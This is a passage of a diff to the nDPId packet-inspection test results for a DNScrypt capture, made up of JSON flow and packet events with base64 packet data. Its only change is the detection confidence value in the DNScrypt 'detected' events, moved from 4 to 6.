AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":462,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380805,"flow_last_seen":946739380805,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739380805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":60885,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":462,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380805,"flow_last_seen":946739380805,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739380805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":60885,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":463,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739380805} 00422{"packet_event_id":1,"packet_event_name":"packet","packet_id":463,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739380805,"pkt":"REREREREZmZmZmZmCABFAABQ\/YoAuX4RxOQKAAAB1C\/kiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":464,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":2,"flow_last_seen":946739380832,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739380832,"pkt":"ZmZmZmZmRERERERECABFAADWpUBAADIRKWLUL+SICgAAAQG7leMAwtNqbd6BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAJmcghkbnNjcnlwdANvcmcAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAAGnqbCRK7WvFnA0fqnvTaP0TkhGLYlM337fP\/M0VQi0o3wTy7gpqyMQZFkjfrWn031Ofm4JJLwM1X8FbNxmrQCWUcFQ8RQkVXWSFLecisgk5xXaKVbLy2ZX6VNRztvrCJZRwVDxFCRVAAAAAV9ToghfVPOI"} @@ -940,24 +940,24 @@ 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":469,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":2,"flow_last_seen":946739380844,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739380844,"pkt":"ZmZmZmZmRERERERECABFAADWpUVAADIRKV3UL+SICgAAAQG7n0cAwsoEbeCBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAJmcghkbnNjcnlwdANvcmcAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAAGnqbCRK7WvFnA0fqnvTaP0TkhGLYlM337fP\/M0VQi0o3wTy7gpqyMQZFkjfrWn031Ofm4JJLwM1X8FbNxmrQCWUcFQ8RQkVXWSFLecisgk5xXaKVbLy2ZX6VNRztvrCJZRwVDxFCRVAAAAAV9ToghfVPOI"} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":470,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380983,"flow_last_seen":946739380983,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739380983,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":58948,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":1,"flow_last_seen":946739380983,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739380983,"pkt":"REREREREZmZmZmZmCABFAAIcVMVAAH4RMmQKAAABVQVd5uZEIPsCCHXB4\/IBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhpYmtzdHVybQAAEAABAAAAAAAAAAAAAcsADAHHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":470,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380983,"flow_last_seen":946739380983,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739380983,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":58948,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":470,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380983,"flow_last_seen":946739380983,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739380983,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":58948,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":471,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380983,"flow_last_seen":946739380983,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739380983,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":50403,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":1,"flow_last_seen":946739380983,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739380983,"pkt":"REREREREZmZmZmZmCABFAAIcCx1AAH4RfAwKAAABVQVd5sTjIPsCCHXB4\/ABAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhpYmtzdHVybQAAEAABAAAAAAAAAAAAAcsADAHHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":471,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380983,"flow_last_seen":946739380983,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739380983,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":50403,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":471,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380983,"flow_last_seen":946739380983,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739380983,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":50403,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":472,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380983,"flow_last_seen":946739380983,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739380983,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":46646,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":1,"flow_last_seen":946739380983,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739380983,"pkt":"REREREREZmZmZmZmCABFAAIcVMZAAH4RMmMKAAABVQVd5rY2IPsCCHXB4+4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhpYmtzdHVybQAAEAABAAAAAAAAAAAAAcsADAHHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":472,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380983,"flow_last_seen":946739380983,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739380983,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":46646,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":472,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380983,"flow_last_seen":946739380983,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739380983,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":46646,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":473,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380984,"flow_last_seen":946739380984,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739380984,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":57090,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":1,"flow_last_seen":946739380984,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739380984,"pkt":"REREREREZmZmZmZmCABFAAXcVMcgAH4RTqIKAAABVQVd5t8CIPsGBKCC4+8BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhpYmtzdHVybQAAEAABAAAAAAAAAAAABccADAXDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":473,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380984,"flow_last_seen":946739380984,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739380984,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":57090,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":473,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380984,"flow_last_seen":946739380984,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739380984,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":57090,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":474,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739380984} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":474,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739380984,"pkt":"REREREREZmZmZmZmCABFAABQVMcAuX4Rc3UKAAABVQVd5gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":475,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380984,"flow_last_seen":946739380984,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739380984,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":51826,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02427{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":475,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":1,"flow_last_seen":946739380984,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739380984,"pkt":"REREREREZmZmZmZmCABFAAXcVMkgAH4RTqAKAAABVQVd5spyIPsGBLUQ4\/EBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhpYmtzdHVybQAAEAABAAAAAAAAAAAABccADAXDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} 